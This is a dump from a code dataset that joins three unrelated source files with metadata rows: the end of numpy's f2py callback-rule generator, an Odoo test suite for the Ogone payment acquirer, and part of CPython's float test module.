{l_and(debugcapi, l_and(l_not(iscomplex), isintent_c)):
'\tfprintf(stderr,"#showvalueformat#.\\n",#varname_i#);'},
{l_and(debugcapi, l_and(l_not(iscomplex), l_not( isintent_c))):
'\tfprintf(stderr,"#showvalueformat#.\\n",*#varname_i#_cb_capi);'},
{l_and(debugcapi, l_and(iscomplex, isintent_c)):
'\tfprintf(stderr,"#showvalueformat#.\\n",(#varname_i#).r,(#varname_i#).i);'},
{l_and(debugcapi, l_and(iscomplex, l_not( isintent_c))):
'\tfprintf(stderr,"#showvalueformat#.\\n",(*#varname_i#_cb_capi).r,(*#varname_i#_cb_capi).i);'},
],
'need': [{isintent_out: ['#ctype#_from_pyobj', 'GETSCALARFROMPYTUPLE']},
{debugcapi: 'CFUNCSMESS'}],
'_check': isscalar
}, {
'pyobjfrom': [{isintent_in: """\
\tif (#name#_nofargs>capi_i)
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyobj_from_#ctype#1(#varname_i#)))
\t\t\tgoto capi_fail;"""},
{isintent_inout: """\
\tif (#name#_nofargs>capi_i)
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyarr_from_p_#ctype#1(#varname_i#_cb_capi)))
\t\t\tgoto capi_fail;"""}],
'need': [{isintent_in: 'pyobj_from_#ctype#1'},
{isintent_inout: 'pyarr_from_p_#ctype#1'},
{iscomplex: '#ctype#'}],
'_check': l_and(isscalar, isintent_nothide),
'_optional': ''
}, { # String
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting #varname#->\\"");'},
"""\tif (capi_j>capi_i)
\t\tGETSTRFROMPYTUPLE(capi_return,capi_i++,#varname_i#,#varname_i#_cb_len);""",
{debugcapi:
'\tfprintf(stderr,"#showvalueformat#\\":%d:.\\n",#varname_i#,#varname_i#_cb_len);'},
],
'need': ['#ctype#', 'GETSTRFROMPYTUPLE',
{debugcapi: 'CFUNCSMESS'}, 'string.h'],
'_check': l_and(isstring, isintent_out)
}, {
'pyobjfrom': [{debugcapi: '\tfprintf(stderr,"debug-capi:cb:#varname#=\\"#showvalueformat#\\":%d:\\n",#varname_i#,#varname_i#_cb_len);'},
{isintent_in: """\
\tif (#name#_nofargs>capi_i)
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyobj_from_#ctype#1size(#varname_i#,#varname_i#_cb_len)))
\t\t\tgoto capi_fail;"""},
{isintent_inout: """\
\tif (#name#_nofargs>capi_i) {
\t\tint #varname_i#_cb_dims[] = {#varname_i#_cb_len};
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyarr_from_p_#ctype#1(#varname_i#,#varname_i#_cb_dims)))
\t\t\tgoto capi_fail;
\t}"""}],
'need': [{isintent_in: 'pyobj_from_#ctype#1size'},
{isintent_inout: 'pyarr_from_p_#ctype#1'}],
'_check': l_and(isstring, isintent_nothide),
'_optional': ''
},
# Array ...
{
'decl': '\tnpy_intp #varname_i#_Dims[#rank#] = {#rank*[-1]#};',
'setdims': '\t#cbsetdims#;',
'_check': isarray,
'_depend': ''
},
{
'pyobjfrom': [{debugcapi: '\tfprintf(stderr,"debug-capi:cb:#varname#\\n");'},
{isintent_c: """\
\tif (#name#_nofargs>capi_i) {
\t\tPyArrayObject *tmp_arr = (PyArrayObject *)PyArray_New(&PyArray_Type,#rank#,#varname_i#_Dims,#atype#,NULL,(char*)#varname_i#,0,NPY_ARRAY_CARRAY,NULL); /*XXX: Hmm, what will destroy this array??? */
""",
l_not(isintent_c): """\
\tif (#name#_nofargs>capi_i) {
\t\tPyArrayObject *tmp_arr = (PyArrayObject *)PyArray_New(&PyArray_Type,#rank#,#varname_i#_Dims,#atype#,NULL,(char*)#varname_i#,0,NPY_ARRAY_FARRAY,NULL); /*XXX: Hmm, what will destroy this array??? */
""",
},
"""
\t\tif (tmp_arr==NULL)
\t\t\tgoto capi_fail;
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,(PyObject *)tmp_arr))
\t\t\tgoto capi_fail;
}"""],
'_check': l_and(isarray, isintent_nothide, l_or(isintent_in, isintent_inout)),
'_optional': '',
}, {
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting #varname#->");'},
"""\tif (capi_j>capi_i) {
\t\tPyArrayObject *rv_cb_arr = NULL;
\t\tif ((capi_tmp = PyTuple_GetItem(capi_return,capi_i++))==NULL) goto capi_fail;
\t\trv_cb_arr = array_from_pyobj(#atype#,#varname_i#_Dims,#rank#,F2PY_INTENT_IN""",
{isintent_c: '|F2PY_INTENT_C'},
""",capi_tmp);
\t\tif (rv_cb_arr == NULL) {
\t\t\tfprintf(stderr,\"rv_cb_arr is NULL\\n\");
\t\t\tgoto capi_fail;
\t\t}
\t\tMEMCOPY(#varname_i#,PyArray_DATA(rv_cb_arr),PyArray_NBYTES(rv_cb_arr));
\t\tif (capi_tmp != (PyObject *)rv_cb_arr) {
\t\t\tPy_DECREF(rv_cb_arr);
\t\t}
\t}""",
{debugcapi: '\tfprintf(stderr,"<-.\\n");'},
],
'need': ['MEMCOPY', {iscomplexarray: '#ctype#'}],
'_check': l_and(isarray, isintent_out)
}, {
'docreturn': '#varname#,',
'_check': isintent_out
}
]
################## Build call-back module #############
cb_map = {}
def buildcallbacks(m):
global cb_map
cb_map[m['name']] = []
for bi in m['body']:
if bi['block'] == 'interface':
for b in bi['body']:
if b:
buildcallback(b, m['name'])
else:
errmess('warning: empty body for %s\n' % (m['name']))
def buildcallback(rout, um):
global cb_map
from . import capi_maps
outmess('\tConstructing call-back function "cb_%s_in_%s"\n' %
(rout['name'], um))
args, depargs = getargs(rout)
capi_maps.depargs = depargs
var = rout['vars']
vrd = capi_maps.cb_routsign2map(rout, um)
rd = dictappend({}, vrd)
cb_map[um].append([rout['name'], rd['name']])
for r in cb_rout_rules:
if ('_check' in r and r['_check'](rout)) or ('_check' not in r):
ar = applyrules(r, vrd, rout)
rd = dictappend(rd, ar)
savevrd = {}
for i, a in enumerate(args):
vrd = capi_maps.cb_sign2map(a, var[a], index=i)
savevrd[a] = vrd
for r in cb_arg_rules:
if '_depend' in r:
continue
if '_optional' in r and isoptional(var[a]):
continue
if ('_check' in r and r['_check'](var[a])) or ('_check' not in r):
ar = applyrules(r, vrd, var[a])
rd = dictappend(rd, ar)
if '_break' in r:
break
for a in args:
vrd = savevrd[a]
for r in cb_arg_rules:
if '_depend' in r:
continue
if ('_optional' not in r) or ('_optional' in r and isrequired(var[a])):
continue
if ('_check' in r and r['_check'](var[a])) or ('_check' not in r):
ar = applyrules(r, vrd, var[a])
rd = dictappend(rd, ar)
if '_break' in r:
break
for a in depargs:
vrd = savevrd[a]
for r in cb_arg_rules:
if '_depend' not in r:
continue
if '_optional' in r:
continue
if ('_check' in r and r['_check'](var[a])) or ('_check' not in r):
ar = applyrules(r, vrd, var[a])
rd = dictappend(rd, ar)
if '_break' in r:
break
if 'args' in rd and 'optargs' in rd:
if isinstance(rd['optargs'], list):
rd['optargs'] = rd['optargs'] + ["""
#ifndef F2PY_CB_RETURNCOMPLEX
,
#endif
"""]
rd['optargs_nm'] = rd['optargs_nm'] + ["""
#ifndef F2PY_CB_RETURNCOMPLEX
,
#endif
"""]
rd['optargs_td'] = rd['optargs_td'] + ["""
#ifndef F2PY_CB_RETURNCOMPLEX
,
#endif
"""]
if isinstance(rd['docreturn'], list):
rd['docreturn'] = stripcomma(
replace('#docreturn#', {'docreturn': rd['docreturn']}))
optargs = stripcomma(replace('#docsignopt#',
{'docsignopt': rd['docsignopt']}
))
if optargs == '':
rd['docsignature'] = stripcomma(
replace('#docsign#', {'docsign': rd['docsign']}))
else:
rd['docsignature'] = replace('#docsign#[#docsignopt#]',
{'docsign': rd['docsign'],
'docsignopt': optargs,
})
rd['latexdocsignature'] = rd['docsignature'].replace('_', '\\_')
rd['latexdocsignature'] = rd['latexdocsignature'].replace(',', ', ')
rd['docstrsigns'] = []
rd['latexdocstrsigns'] = []
for k in ['docstrreq', 'docstropt', 'docstrout', 'docstrcbs']:
if k in rd and isinstance(rd[k], list):
rd['docstrsigns'] = rd['docstrsigns'] + rd[k]
k = 'latex' + k
if k in rd and isinstance(rd[k], list):
rd['latexdocstrsigns'] = rd['latexdocstrsigns'] + rd[k][0:1] +\
['\\begin{description}'] + rd[k][1:] +\
['\\end{description}']
if 'args' not in rd:
rd['args'] = ''
rd['args_td'] = ''
rd['args_nm'] = ''
if not (rd.get('args') or rd.get('optargs') or rd.get('strarglens')):
rd['noargs'] = 'void'
ar = applyrules(cb_routine_rules, rd)
cfuncs.callbacks[rd['name']] = ar['body']
if isinstance(ar['need'], str):
ar['need'] = [ar['need']]
if 'need' in rd:
for t in cfuncs.typedefs.keys():
if t in rd['need']:
ar['need'].append(t)
cfuncs.typedefs_generated[rd['name'] + '_typedef'] = ar['cbtypedefs']
ar['need'].append(rd['name'] + '_typedef')
cfuncs.needs[rd['name']] = ar['need']
capi_maps.lcb2_map[rd['name']] = {'maxnofargs': ar['maxnofargs'],
'nofoptargs': ar['nofoptargs'],
'docstr': ar['docstr'],
'latexdocstr': ar['latexdocstr'],
'argname': rd['argname']
}
outmess('\t %s\n' % (ar['docstrshort']))
return
################## Build call-back function #############
| bsd-3-clause | -1,841,184,518,440,323,800 | 39.126354 | 230 | 0.535403 | false |
alexcuellar/odoo | addons/payment_ogone/tests/test_ogone.py | 430 | 9309 | # -*- coding: utf-8 -*-
from lxml import objectify
import time
import urlparse
from openerp.addons.payment.models.payment_acquirer import ValidationError
from openerp.addons.payment.tests.common import PaymentAcquirerCommon
from openerp.addons.payment_ogone.controllers.main import OgoneController
from openerp.tools import mute_logger
class OgonePayment(PaymentAcquirerCommon):
def setUp(self):
super(OgonePayment, self).setUp()
cr, uid = self.cr, self.uid
self.base_url = self.registry('ir.config_parameter').get_param(cr, uid, 'web.base.url')
# get the adyen account
model, self.ogone_id = self.registry('ir.model.data').get_object_reference(cr, uid, 'payment_ogone', 'payment_acquirer_ogone')
def test_10_ogone_form_render(self):
cr, uid, context = self.cr, self.uid, {}
# be sure not to do stupid thing
ogone = self.payment_acquirer.browse(self.cr, self.uid, self.ogone_id, None)
self.assertEqual(ogone.environment, 'test', 'test without test environment')
# ----------------------------------------
# Test: button direct rendering + shasign
# ----------------------------------------
form_values = {
'PSPID': 'dummy',
'ORDERID': 'test_ref0',
'AMOUNT': '1',
'CURRENCY': 'EUR',
'LANGUAGE': 'en_US',
'CN': 'Norbert Buyer',
'EMAIL': '[email protected]',
'OWNERZIP': '1000',
'OWNERADDRESS': 'Huge Street 2/543',
'OWNERCTY': 'Belgium',
'OWNERTOWN': 'Sin City',
'OWNERTELNO': '0032 12 34 56 78',
'SHASIGN': '815f67b8ff70d234ffcf437c13a9fa7f807044cc',
'ACCEPTURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._accept_url),
'DECLINEURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._decline_url),
'EXCEPTIONURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._exception_url),
'CANCELURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._cancel_url),
}
# render the button
res = self.payment_acquirer.render(
cr, uid, self.ogone_id,
'test_ref0', 0.01, self.currency_euro_id,
partner_id=None,
partner_values=self.buyer_values,
context=context)
# check form result
tree = objectify.fromstring(res)
self.assertEqual(tree.get('action'), 'https://secure.ogone.com/ncol/test/orderstandard.asp', 'ogone: wrong form POST url')
for form_input in tree.input:
if form_input.get('name') in ['submit']:
continue
self.assertEqual(
form_input.get('value'),
form_values[form_input.get('name')],
'ogone: wrong value for input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')])
)
# ----------------------------------------
# Test2: button using tx + validation
# ----------------------------------------
# create a new draft tx
tx_id = self.payment_transaction.create(
cr, uid, {
'amount': 0.01,
'acquirer_id': self.ogone_id,
'currency_id': self.currency_euro_id,
'reference': 'test_ref0',
'partner_id': self.buyer_id,
}, context=context
)
# render the button
res = self.payment_acquirer.render(
cr, uid, self.ogone_id,
'should_be_erased', 0.01, self.currency_euro,
tx_id=tx_id,
partner_id=None,
partner_values=self.buyer_values,
context=context)
# check form result
tree = objectify.fromstring(res)
self.assertEqual(tree.get('action'), 'https://secure.ogone.com/ncol/test/orderstandard.asp', 'ogone: wrong form POST url')
for form_input in tree.input:
if form_input.get('name') in ['submit']:
continue
self.assertEqual(
form_input.get('value'),
form_values[form_input.get('name')],
'ogone: wrong value for form input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')])
)
@mute_logger('openerp.addons.payment_ogone.models.ogone', 'ValidationError')
def test_20_ogone_form_management(self):
cr, uid, context = self.cr, self.uid, {}
# be sure not to do stupid thing
ogone = self.payment_acquirer.browse(self.cr, self.uid, self.ogone_id, None)
self.assertEqual(ogone.environment, 'test', 'test without test environment')
# typical data posted by ogone after client has successfully paid
ogone_post_data = {
'orderID': u'test_ref_2',
'STATUS': u'9',
'CARDNO': u'XXXXXXXXXXXX0002',
'PAYID': u'25381582',
'CN': u'Norbert Buyer',
'NCERROR': u'0',
'TRXDATE': u'11/15/13',
'IP': u'85.201.233.72',
'BRAND': u'VISA',
'ACCEPTANCE': u'test123',
'currency': u'EUR',
'amount': u'1.95',
'SHASIGN': u'7B7B0ED9CBC4A85543A9073374589033A62A05A5',
'ED': u'0315',
'PM': u'CreditCard'
}
# should raise error about unknown tx
with self.assertRaises(ValidationError):
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# create tx
tx_id = self.payment_transaction.create(
cr, uid, {
'amount': 1.95,
'acquirer_id': self.ogone_id,
'currency_id': self.currency_euro_id,
'reference': 'test_ref_2',
'partner_name': 'Norbert Buyer',
'partner_country_id': self.country_france_id,
}, context=context
)
# validate it
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# check state
tx = self.payment_transaction.browse(cr, uid, tx_id, context=context)
self.assertEqual(tx.state, 'done', 'ogone: validation did not put tx into done state')
self.assertEqual(tx.ogone_payid, ogone_post_data.get('PAYID'), 'ogone: validation did not update tx payid')
# reset tx
tx.write({'state': 'draft', 'date_validate': False, 'ogone_payid': False})
# now ogone post is ok: try to modify the SHASIGN
ogone_post_data['SHASIGN'] = 'a4c16bae286317b82edb49188d3399249a784691'
with self.assertRaises(ValidationError):
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# simulate an error
ogone_post_data['STATUS'] = 2
ogone_post_data['SHASIGN'] = 'a4c16bae286317b82edb49188d3399249a784691'
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# check state
tx = self.payment_transaction.browse(cr, uid, tx_id, context=context)
self.assertEqual(tx.state, 'error', 'ogone: erroneous validation did not put tx into error state')
def test_30_ogone_s2s(self):
test_ref = 'test_ref_%.15f' % time.time()
cr, uid, context = self.cr, self.uid, {}
# be sure not to do stupid thing
ogone = self.payment_acquirer.browse(self.cr, self.uid, self.ogone_id, None)
self.assertEqual(ogone.environment, 'test', 'test without test environment')
# create a new draft tx
tx_id = self.payment_transaction.create(
cr, uid, {
'amount': 0.01,
'acquirer_id': self.ogone_id,
'currency_id': self.currency_euro_id,
'reference': test_ref,
'partner_id': self.buyer_id,
'type': 'server2server',
}, context=context
)
# create an alias
res = self.payment_transaction.ogone_s2s_create_alias(
cr, uid, tx_id, {
'expiry_date_mm': '01',
'expiry_date_yy': '2015',
'holder_name': 'Norbert Poilu',
'number': '4000000000000002',
'brand': 'VISA',
}, context=context)
# check an alias is set, containing at least OPENERP
tx = self.payment_transaction.browse(cr, uid, tx_id, context=context)
self.assertIn('OPENERP', tx.partner_reference, 'ogone: wrong partner reference after creating an alias')
res = self.payment_transaction.ogone_s2s_execute(cr, uid, tx_id, {}, context=context)
# print res
# {
# 'orderID': u'reference',
# 'STATUS': u'9',
# 'CARDNO': u'XXXXXXXXXXXX0002',
# 'PAYID': u'24998692',
# 'CN': u'Norbert Poilu',
# 'NCERROR': u'0',
# 'TRXDATE': u'11/05/13',
# 'IP': u'85.201.233.72',
# 'BRAND': u'VISA',
# 'ACCEPTANCE': u'test123',
# 'currency': u'EUR',
# 'amount': u'1.95',
# 'SHASIGN': u'EFDC56879EF7DE72CCF4B397076B5C9A844CB0FA',
# 'ED': u'0314',
# 'PM': u'CreditCard'
# }
| agpl-3.0 | 7,760,184,979,265,681,000 | 40.373333 | 170 | 0.562896 | false |
dennis-sheil/commandergenius | project/jni/python/src/Lib/test/test_float.py | 51 | 33323 |
import unittest, struct
import os
from test import test_support
import math
from math import isinf, isnan, copysign, ldexp
import operator
import random, fractions
INF = float("inf")
NAN = float("nan")
class GeneralFloatCases(unittest.TestCase):
def test_float(self):
self.assertEqual(float(3.14), 3.14)
self.assertEqual(float(314), 314.0)
self.assertEqual(float(314L), 314.0)
self.assertEqual(float(" 3.14 "), 3.14)
self.assertRaises(ValueError, float, " 0x3.1 ")
self.assertRaises(ValueError, float, " -0x3.p-1 ")
self.assertRaises(ValueError, float, " +0x3.p-1 ")
self.assertRaises(ValueError, float, "++3.14")
self.assertRaises(ValueError, float, "+-3.14")
self.assertRaises(ValueError, float, "-+3.14")
self.assertRaises(ValueError, float, "--3.14")
if test_support.have_unicode:
self.assertEqual(float(unicode(" 3.14 ")), 3.14)
self.assertEqual(float(unicode(" \u0663.\u0661\u0664 ",'raw-unicode-escape')), 3.14)
# Implementation limitation in PyFloat_FromString()
self.assertRaises(ValueError, float, unicode("1"*10000))
@test_support.run_with_locale('LC_NUMERIC', 'fr_FR', 'de_DE')
def test_float_with_comma(self):
# set locale to something that doesn't use '.' for the decimal point
# float must not accept the locale specific decimal point but
# it still has to accept the normal python syntac
import locale
if not locale.localeconv()['decimal_point'] == ',':
return
self.assertEqual(float(" 3.14 "), 3.14)
self.assertEqual(float("+3.14 "), 3.14)
self.assertEqual(float("-3.14 "), -3.14)
self.assertEqual(float(".14 "), .14)
self.assertEqual(float("3. "), 3.0)
self.assertEqual(float("3.e3 "), 3000.0)
self.assertEqual(float("3.2e3 "), 3200.0)
self.assertEqual(float("2.5e-1 "), 0.25)
self.assertEqual(float("5e-1"), 0.5)
self.assertRaises(ValueError, float, " 3,14 ")
self.assertRaises(ValueError, float, " +3,14 ")
self.assertRaises(ValueError, float, " -3,14 ")
self.assertRaises(ValueError, float, " 0x3.1 ")
self.assertRaises(ValueError, float, " -0x3.p-1 ")
self.assertRaises(ValueError, float, " +0x3.p-1 ")
self.assertEqual(float(" 25.e-1 "), 2.5)
self.assertEqual(test_support.fcmp(float(" .25e-1 "), .025), 0)
def test_floatconversion(self):
# Make sure that calls to __float__() work properly
class Foo0:
def __float__(self):
return 42.
class Foo1(object):
def __float__(self):
return 42.
class Foo2(float):
def __float__(self):
return 42.
class Foo3(float):
def __new__(cls, value=0.):
return float.__new__(cls, 2*value)
def __float__(self):
return self
class Foo4(float):
def __float__(self):
return 42
self.assertAlmostEqual(float(Foo0()), 42.)
self.assertAlmostEqual(float(Foo1()), 42.)
self.assertAlmostEqual(float(Foo2()), 42.)
self.assertAlmostEqual(float(Foo3(21)), 42.)
self.assertRaises(TypeError, float, Foo4(42))
def test_floatasratio(self):
for f, ratio in [
(0.875, (7, 8)),
(-0.875, (-7, 8)),
(0.0, (0, 1)),
(11.5, (23, 2)),
]:
self.assertEqual(f.as_integer_ratio(), ratio)
for i in range(10000):
f = random.random()
f *= 10 ** random.randint(-100, 100)
n, d = f.as_integer_ratio()
self.assertEqual(float(n).__truediv__(d), f)
R = fractions.Fraction
self.assertEqual(R(0, 1),
R(*float(0.0).as_integer_ratio()))
self.assertEqual(R(5, 2),
R(*float(2.5).as_integer_ratio()))
self.assertEqual(R(1, 2),
R(*float(0.5).as_integer_ratio()))
self.assertEqual(R(4728779608739021, 2251799813685248),
R(*float(2.1).as_integer_ratio()))
self.assertEqual(R(-4728779608739021, 2251799813685248),
R(*float(-2.1).as_integer_ratio()))
self.assertEqual(R(-2100, 1),
R(*float(-2100.0).as_integer_ratio()))
self.assertRaises(OverflowError, float('inf').as_integer_ratio)
self.assertRaises(OverflowError, float('-inf').as_integer_ratio)
self.assertRaises(ValueError, float('nan').as_integer_ratio)
class FormatFunctionsTestCase(unittest.TestCase):
def setUp(self):
self.save_formats = {'double':float.__getformat__('double'),
'float':float.__getformat__('float')}
def tearDown(self):
float.__setformat__('double', self.save_formats['double'])
float.__setformat__('float', self.save_formats['float'])
def test_getformat(self):
self.assert_(float.__getformat__('double') in
['unknown', 'IEEE, big-endian', 'IEEE, little-endian'])
self.assert_(float.__getformat__('float') in
['unknown', 'IEEE, big-endian', 'IEEE, little-endian'])
self.assertRaises(ValueError, float.__getformat__, 'chicken')
self.assertRaises(TypeError, float.__getformat__, 1)
def test_setformat(self):
for t in 'double', 'float':
float.__setformat__(t, 'unknown')
if self.save_formats[t] == 'IEEE, big-endian':
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, little-endian')
elif self.save_formats[t] == 'IEEE, little-endian':
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, big-endian')
else:
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, big-endian')
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, little-endian')
self.assertRaises(ValueError, float.__setformat__,
t, 'chicken')
self.assertRaises(ValueError, float.__setformat__,
'chicken', 'unknown')
BE_DOUBLE_INF = '\x7f\xf0\x00\x00\x00\x00\x00\x00'
LE_DOUBLE_INF = ''.join(reversed(BE_DOUBLE_INF))
BE_DOUBLE_NAN = '\x7f\xf8\x00\x00\x00\x00\x00\x00'
LE_DOUBLE_NAN = ''.join(reversed(BE_DOUBLE_NAN))
BE_FLOAT_INF = '\x7f\x80\x00\x00'
LE_FLOAT_INF = ''.join(reversed(BE_FLOAT_INF))
BE_FLOAT_NAN = '\x7f\xc0\x00\x00'
LE_FLOAT_NAN = ''.join(reversed(BE_FLOAT_NAN))
# on non-IEEE platforms, attempting to unpack a bit pattern
# representing an infinity or a NaN should raise an exception.
class UnknownFormatTestCase(unittest.TestCase):
def setUp(self):
self.save_formats = {'double':float.__getformat__('double'),
'float':float.__getformat__('float')}
float.__setformat__('double', 'unknown')
float.__setformat__('float', 'unknown')
def tearDown(self):
float.__setformat__('double', self.save_formats['double'])
float.__setformat__('float', self.save_formats['float'])
def test_double_specials_dont_unpack(self):
for fmt, data in [('>d', BE_DOUBLE_INF),
('>d', BE_DOUBLE_NAN),
('<d', LE_DOUBLE_INF),
('<d', LE_DOUBLE_NAN)]:
self.assertRaises(ValueError, struct.unpack, fmt, data)
def test_float_specials_dont_unpack(self):
for fmt, data in [('>f', BE_FLOAT_INF),
('>f', BE_FLOAT_NAN),
('<f', LE_FLOAT_INF),
('<f', LE_FLOAT_NAN)]:
self.assertRaises(ValueError, struct.unpack, fmt, data)
# on an IEEE platform, all we guarantee is that bit patterns
# representing infinities or NaNs do not raise an exception; all else
# is accident (today).
# let's also try to guarantee that -0.0 and 0.0 don't get confused.
class IEEEFormatTestCase(unittest.TestCase):
if float.__getformat__("double").startswith("IEEE"):
def test_double_specials_do_unpack(self):
for fmt, data in [('>d', BE_DOUBLE_INF),
('>d', BE_DOUBLE_NAN),
('<d', LE_DOUBLE_INF),
('<d', LE_DOUBLE_NAN)]:
struct.unpack(fmt, data)
if float.__getformat__("float").startswith("IEEE"):
def test_float_specials_do_unpack(self):
for fmt, data in [('>f', BE_FLOAT_INF),
('>f', BE_FLOAT_NAN),
('<f', LE_FLOAT_INF),
('<f', LE_FLOAT_NAN)]:
struct.unpack(fmt, data)
if float.__getformat__("double").startswith("IEEE"):
def test_negative_zero(self):
import math
def pos_pos():
return 0.0, math.atan2(0.0, -1)
def pos_neg():
return 0.0, math.atan2(-0.0, -1)
def neg_pos():
return -0.0, math.atan2(0.0, -1)
def neg_neg():
return -0.0, math.atan2(-0.0, -1)
self.assertEquals(pos_pos(), neg_pos())
self.assertEquals(pos_neg(), neg_neg())
if float.__getformat__("double").startswith("IEEE"):
def test_underflow_sign(self):
import math
# check that -1e-1000 gives -0.0, not 0.0
self.assertEquals(math.atan2(-1e-1000, -1), math.atan2(-0.0, -1))
self.assertEquals(math.atan2(float('-1e-1000'), -1),
math.atan2(-0.0, -1))
class ReprTestCase(unittest.TestCase):
def test_repr(self):
floats_file = open(os.path.join(os.path.split(__file__)[0],
'floating_points.txt'))
for line in floats_file:
line = line.strip()
if not line or line.startswith('#'):
continue
v = eval(line)
self.assertEqual(v, eval(repr(v)))
floats_file.close()
# Beginning with Python 2.6 float has cross platform compatible
# ways to create and represent inf and nan
class InfNanTest(unittest.TestCase):
def test_inf_from_str(self):
self.assert_(isinf(float("inf")))
self.assert_(isinf(float("+inf")))
self.assert_(isinf(float("-inf")))
self.assert_(isinf(float("infinity")))
self.assert_(isinf(float("+infinity")))
self.assert_(isinf(float("-infinity")))
self.assertEqual(repr(float("inf")), "inf")
self.assertEqual(repr(float("+inf")), "inf")
self.assertEqual(repr(float("-inf")), "-inf")
self.assertEqual(repr(float("infinity")), "inf")
self.assertEqual(repr(float("+infinity")), "inf")
self.assertEqual(repr(float("-infinity")), "-inf")
self.assertEqual(repr(float("INF")), "inf")
self.assertEqual(repr(float("+Inf")), "inf")
self.assertEqual(repr(float("-iNF")), "-inf")
self.assertEqual(repr(float("Infinity")), "inf")
self.assertEqual(repr(float("+iNfInItY")), "inf")
self.assertEqual(repr(float("-INFINITY")), "-inf")
self.assertEqual(str(float("inf")), "inf")
self.assertEqual(str(float("+inf")), "inf")
self.assertEqual(str(float("-inf")), "-inf")
self.assertEqual(str(float("infinity")), "inf")
self.assertEqual(str(float("+infinity")), "inf")
self.assertEqual(str(float("-infinity")), "-inf")
self.assertRaises(ValueError, float, "info")
self.assertRaises(ValueError, float, "+info")
self.assertRaises(ValueError, float, "-info")
self.assertRaises(ValueError, float, "in")
self.assertRaises(ValueError, float, "+in")
self.assertRaises(ValueError, float, "-in")
self.assertRaises(ValueError, float, "infinit")
self.assertRaises(ValueError, float, "+Infin")
self.assertRaises(ValueError, float, "-INFI")
self.assertRaises(ValueError, float, "infinitys")
def test_inf_as_str(self):
self.assertEqual(repr(1e300 * 1e300), "inf")
self.assertEqual(repr(-1e300 * 1e300), "-inf")
self.assertEqual(str(1e300 * 1e300), "inf")
self.assertEqual(str(-1e300 * 1e300), "-inf")
def test_nan_from_str(self):
self.assert_(isnan(float("nan")))
self.assert_(isnan(float("+nan")))
self.assert_(isnan(float("-nan")))
self.assertEqual(repr(float("nan")), "nan")
self.assertEqual(repr(float("+nan")), "nan")
self.assertEqual(repr(float("-nan")), "nan")
self.assertEqual(repr(float("NAN")), "nan")
self.assertEqual(repr(float("+NAn")), "nan")
self.assertEqual(repr(float("-NaN")), "nan")
self.assertEqual(str(float("nan")), "nan")
self.assertEqual(str(float("+nan")), "nan")
self.assertEqual(str(float("-nan")), "nan")
self.assertRaises(ValueError, float, "nana")
self.assertRaises(ValueError, float, "+nana")
self.assertRaises(ValueError, float, "-nana")
self.assertRaises(ValueError, float, "na")
self.assertRaises(ValueError, float, "+na")
self.assertRaises(ValueError, float, "-na")
def test_nan_as_str(self):
self.assertEqual(repr(1e300 * 1e300 * 0), "nan")
self.assertEqual(repr(-1e300 * 1e300 * 0), "nan")
self.assertEqual(str(1e300 * 1e300 * 0), "nan")
self.assertEqual(str(-1e300 * 1e300 * 0), "nan")
def notest_float_nan(self):
self.assert_(NAN.is_nan())
self.failIf(INF.is_nan())
self.failIf((0.).is_nan())
def notest_float_inf(self):
self.assert_(INF.is_inf())
self.failIf(NAN.is_inf())
self.failIf((0.).is_inf())
fromHex = float.fromhex
toHex = float.hex
class HexFloatTestCase(unittest.TestCase):
MAX = fromHex('0x.fffffffffffff8p+1024') # max normal
MIN = fromHex('0x1p-1022') # min normal
TINY = fromHex('0x0.0000000000001p-1022') # min subnormal
EPS = fromHex('0x0.0000000000001p0') # diff between 1.0 and next float up
def identical(self, x, y):
# check that floats x and y are identical, or that both
# are NaNs
if isnan(x) or isnan(y):
if isnan(x) == isnan(y):
return
elif x == y and (x != 0.0 or copysign(1.0, x) == copysign(1.0, y)):
return
self.fail('%r not identical to %r' % (x, y))
def test_ends(self):
self.identical(self.MIN, ldexp(1.0, -1022))
self.identical(self.TINY, ldexp(1.0, -1074))
self.identical(self.EPS, ldexp(1.0, -52))
self.identical(self.MAX, 2.*(ldexp(1.0, 1023) - ldexp(1.0, 970)))
def test_invalid_inputs(self):
invalid_inputs = [
'infi', # misspelt infinities and nans
'-Infinit',
'++inf',
'-+Inf',
'--nan',
'+-NaN',
'snan',
'NaNs',
'nna',
'0xnan',
'',
' ',
'x1.0p0',
'0xX1.0p0',
'+ 0x1.0p0', # internal whitespace
'- 0x1.0p0',
'0 x1.0p0',
'0x 1.0p0',
'0x1 2.0p0',
'+0x1 .0p0',
'0x1. 0p0',
'-0x1.0 1p0',
'-0x1.0 p0',
'+0x1.0p +0',
'0x1.0p -0',
'0x1.0p 0',
'+0x1.0p+ 0',
'-0x1.0p- 0',
'++0x1.0p-0', # double signs
'--0x1.0p0',
'+-0x1.0p+0',
'-+0x1.0p0',
'0x1.0p++0',
'+0x1.0p+-0',
'-0x1.0p-+0',
'0x1.0p--0',
'0x1.0.p0',
'0x.p0', # no hex digits before or after point
'0x1,p0', # wrong decimal point character
'0x1pa',
u'0x1p\uff10', # fullwidth Unicode digits
u'\uff10x1p0',
u'0x\uff11p0',
u'0x1.\uff10p0',
'0x1p0 \n 0x2p0',
'0x1p0\0 0x1p0', # embedded null byte is not end of string
]
for x in invalid_inputs:
try:
result = fromHex(x)
except ValueError:
pass
else:
self.fail('Expected float.fromhex(%r) to raise ValueError; '
'got %r instead' % (x, result))
